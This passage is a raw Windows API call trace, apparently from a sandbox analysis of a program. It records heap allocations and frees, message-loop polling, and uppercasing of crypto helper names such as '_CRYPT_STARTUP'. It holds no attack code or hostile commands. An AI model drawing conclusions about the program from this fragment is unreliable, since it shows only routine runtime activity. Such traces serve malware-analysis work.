hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0136.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0136.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0136.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0136.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0136.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0136.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0136.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0136.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0136.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0136.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0136.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0136.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0136.167] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0136.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0136.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0136.167] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0136.167] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0136.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0136.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.167] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0136.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0136.168] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0136.168] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0136.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.168] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0136.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0136.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0136.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.169] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0136.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.169] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0136.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0136.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0136.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0136.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0136.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0136.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0136.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0136.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0136.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0136.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0136.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0136.171] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0136.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0136.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0136.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0136.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0136.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0136.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0136.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0136.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0136.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0136.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0136.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0136.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0136.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0136.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f2) returned 0x2ec3830 [0136.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0136.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec3830 | out: hHeap=0x970000) returned 1 [0136.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0136.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0136.180] HeapFree (in: 